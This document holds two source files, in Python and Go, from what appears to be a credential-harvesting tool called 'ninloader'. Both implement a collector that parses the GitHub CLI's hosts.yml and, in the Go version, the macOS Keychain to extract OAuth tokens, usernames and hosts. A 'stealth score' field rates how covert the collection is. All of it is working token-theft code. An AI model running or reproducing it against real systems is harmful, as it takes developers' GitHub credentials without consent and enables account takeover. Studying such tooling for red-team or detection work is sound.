File: ninloader/ninloader/collectors/github/gh_cli.py
"""GitHub CLI (gh) token collector — parses ~/.config/gh/hosts.yml with regex."""

from __future__ import annotations

import re
from typing import List

from ..base import BaseCollector
from .. import CollectorRegistry
from ...types import CollectedToken, DiscoveredToken
from ...secure import secure
from ...platform_utils import gh_cli_dir


@CollectorRegistry.register
class GhCliCollector(BaseCollector):
    service = "github"
    source = "gh_cli"
    stealth_score = 5

    def _hosts_path(self):
        return gh_cli_dir() / "hosts.yml"

    def _parse_hosts_yml(self, text: str) -> list:
        """Parse hosts.yml using regex — no PyYAML dependency.

        Format:
        github.com:
            user: username
            oauth_token: gho_xxxxx
            git_protocol: https
        """
        entries = []
        current_host = None
        current_data = {}

        for line in text.splitlines():
            # Top-level host key (no leading whitespace)
            host_match = re.match(r'^(\S+):\s*$', line)
            if host_match:
                if current_host and current_data:
                    entries.append((current_host, current_data))
                current_host = host_match.group(1)
                current_data = {}
                continue

            # Indented key-value pair
            kv_match = re.match(r'^\s+(\w+):\s*(.+)$', line)
            if kv_match and current_host:
                current_data[kv_match.group(1)] = kv_match.group(2).strip()

        if current_host and current_data:
            entries.append((current_host, current_data))

        return entries

    def discover(self) -> List[DiscoveredToken]:
        results = []
        path = self._hosts_path()
        if not path.exists():
            return results

        try:
            text = path.read_text()
            entries = self._parse_hosts_yml(text)

            for host, data in entries:
                token = data.get("oauth_token", "")
                user = data.get("user", "unknown")

                if token:
                    token_preview = f"{token[:8]}..." if len(token) > 8 else "present"
                    details = f"token={token_preview}"
                else:
                    details = "token in system keyring (not in YAML)"

                results.append(DiscoveredToken(
                    service=self.service,
                    source=self.source,
                    path=str(path),
                    account_hint=f"{user}@{host}",
                    stealth_score=self.stealth_score,
                    details=details,
                ))
        except Exception as e:
            self._warn(f"Failed to parse {path}: {e}")

        return results

    def collect(self) -> List[CollectedToken]:
        results = []
        path = self._hosts_path()
        if not path.exists():
            return results

        try:
            text = path.read_text()
            entries = self._parse_hosts_yml(text)

            for host, data in entries:
                token = data.get("oauth_token")
                if not token:
                    continue

                user = data.get("user", "unknown")
                protocol = data.get("git_protocol", "https")

                results.append(CollectedToken(
                    service=self.service,
                    source=self.source,
                    stealth_score=self.stealth_score,
                    username=user,
                    access_token=secure(token),
                    extra={
                        "host": host,
                        "git_protocol": protocol,
                    },
                ))
        except Exception as e:
            self._warn(f"Failed to collect from {path}: {e}")

        return results

File: ninloader/go/collectors/github/gh_cli.go
package github

import (
	"fmt"
	"os"
	"regexp"
	"strings"

	"github.com/ninken/ninloader-go/internal/collector"
	"github.com/ninken/ninloader-go/internal/platform"
	"github.com/ninken/ninloader-go/internal/registry"
	"github.com/ninken/ninloader-go/internal/types"
)

func init() {
	registry.Register("github", "gh_cli", func() collector.Collector {
		return &GhCliCollector{BaseCollector: collector.BaseCollector{Svc: "github", Src: "gh_cli"}}
	})
}

// GhCliCollector extracts GitHub CLI tokens from ~/.config/gh/hosts.yml
// and macOS Keychain.
type GhCliCollector struct {
	collector.BaseCollector
}

func (c *GhCliCollector) Service() string      { return c.Svc }
func (c *GhCliCollector) Source() string        { return c.Src }
func (c *GhCliCollector) StealthScore() int     { return 5 }
func (c *GhCliCollector) Platforms() []string   { return nil }

var (
	reHostLine = regexp.MustCompile(`^(\S+):\s*$`)
	reKVLine   = regexp.MustCompile(`^\s+(\w+):\s*(.+)$`)
)

type ghHostEntry struct {
	host string
	data map[string]string
}

// hostsPath returns the path to gh CLI hosts.yml.
func (c *GhCliCollector) hostsPath() string {
	return platform.GhCliDir() + string(os.PathSeparator) + "hosts.yml"
}

// parseHostsYml parses hosts.yml using regex — no YAML dependency.
//
// Format:
//
//	github.com:
//	    user: username
//	    oauth_token: gho_xxxxx
//	    git_protocol: https
func (c *GhCliCollector) parseHostsYml(text string) []ghHostEntry {
	var entries []ghHostEntry
	var currentHost string
	currentData := map[string]string{}

	for _, line := range strings.Split(text, "\n") {
		// Top-level host key (no leading whitespace)
		if m := reHostLine.FindStringSubmatch(line); m != nil {
			if currentHost != "" && len(currentData) > 0 {
				entries = append(entries, ghHostEntry{host: currentHost, data: currentData})
			}
			currentHost = m[1]
			currentData = map[string]string{}
			continue
		}

		// Indented key-value pair
		if m := reKVLine.FindStringSubmatch(line); m != nil && currentHost != "" {
			currentData[m[1]] = strings.TrimSpace(m[2])
		}
	}

	// Flush last entry
	if currentHost != "" && len(currentData) > 0 {
		entries = append(entries, ghHostEntry{host: currentHost, data: currentData})
	}

	return entries
}

func (c *GhCliCollector) Discover() []*types.DiscoveredToken {
	var results []*types.DiscoveredToken

	path := c.hostsPath()
	if _, err := os.Stat(path); err != nil {
		return results
	}

	data, err := os.ReadFile(path)
	if err != nil {
		c.Warn(fmt.Sprintf("Failed to parse %s: %v", path, err))
		return results
	}

	entries := c.parseHostsYml(string(data))
	for _, entry := range entries {
		token := entry.data["oauth_token"]
		user := entry.data["user"]
		if user == "" {
			user = "unknown"
		}

		var details string
		if token != "" {
			if len(token) > 8 {
				details = fmt.Sprintf("token=%s...", token[:8])
			} else {
				details = "token=present"
			}
		} else {
			// Check macOS Keychain
			keychainToken := c.readKeychain(entry.host)
			if keychainToken != "" {
				details = fmt.Sprintf("token in keychain (extractable, %s...)", keychainToken[:8])
			} else {
				details = "token in system keyring (not extractable)"
			}
		}

		results = append(results, &types.DiscoveredToken{
			Service:      c.Svc,
			Source:       c.Src,
			Path:         path,
			AccountHint:  fmt.Sprintf("%s@%s", user, entry.host),
			StealthScore: 5,
			Details:      details,
		})
	}

	return results
}

func (c *GhCliCollector) Collect() []*types.CollectedToken {
	var results []*types.CollectedToken

	path := c.hostsPath()
	if _, err := os.Stat(path); err != nil {
		return results
	}

	data, err := os.ReadFile(path)
	if err != nil {
		c.Warn(fmt.Sprintf("Failed to collect from %s: %v", path, err))
		return results
	}

	entries := c.parseHostsYml(string(data))
	for _, entry := range entries {
		token := entry.data["oauth_token"]
		tokenSource := "yaml"

		// Fall back to macOS Keychain if token not in YAML
		if token == "" {
			token = c.readKeychain(entry.host)
			tokenSource = "keychain"
		}

		if token == "" {
			continue
		}

		user := entry.data["user"]
		if user == "" {
			user = "unknown"
		}
		protocol := entry.data["git_protocol"]
		if protocol == "" {
			protocol = "https"
		}

		tok := types.NewCollectedToken(c.Svc, c.Src, 5)
		tok.Username = user
		tok.AccessToken = types.Secure(token)
		tok.Extra["host"] = entry.host
		tok.Extra["git_protocol"] = protocol
		tok.Extra["token_source"] = tokenSource
		results = append(results, tok)
	}

	return results
}
